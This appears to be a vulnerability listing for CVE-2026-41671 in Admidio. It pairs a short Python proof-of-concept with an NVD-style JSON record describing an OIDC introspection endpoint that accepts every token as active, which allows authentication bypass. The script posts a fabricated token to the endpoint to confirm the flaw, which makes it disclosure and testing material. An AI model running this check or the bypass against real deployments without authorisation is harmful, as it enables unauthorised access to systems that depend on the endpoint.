CVE-2026-41671

import requests def check_poc(url): # The vulnerable endpoint path target_url = f"{url}/modules/sso/index.php/oidc/introspect" # Use a completely invalid/fabricated token fake_token = "attacker_fabricated_token_payload" # Prepare the payload data = { "token": fake_token } try: response = requests.post(target_url, data=data, timeout=10) if response.status_code == 200: json_response = response.json() # Check if the server claims the fake token is active if json_response.get("active") is True: print("[+] Vulnerability Confirmed! The endpoint accepts invalid tokens.") print(f"[+] Response: {json_response}") else: print("[-] Token returned as inactive. System might be patched.") else: print(f"[-] Unexpected status code: {response.status_code}") except Exception as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": target = "http://localhost/admidio" # Replace with actual target check_poc(target)

{"cve": {"id": "CVE-2026-41671", "sourceIdentifier": "[email protected]", "published": "2026-05-07T04:16:32.863", "lastModified": "2026-05-07T14:54:40.603", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Admidio is an open-source user management solution. Prior to version 5.0.9, the OIDC token introspection endpoint (/modules/sso/index.php/oidc/introspect) always returns {\"active\": true} for every request, regardless of whether a valid token is provided, whether the token is expired, revoked, or completely fabricated. The endpoint performs no authentication of the calling resource server and no validation of the submitted token. Any resource server that relies on this introspection endpoint to validate access tokens will accept all requests as authorized, enabling complete authentication bypass. Additionally, the OIDC token revocation endpoint (/oidc/revoke) returns {\"revoked\": true} without actually revoking any token, preventing resource servers from invalidating compromised credentials. This issue has been patched in version 5.0.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}], "references": [{"url": "https://github.com/Admidio/admidio/releases/tag/v5.0.9", "source": "[email protected]"}, {"url": "https://github.com/Admidio/admidio/security/advisories/GHSA-9xx5-cv6j-x533", "source": "[email protected]"}]}}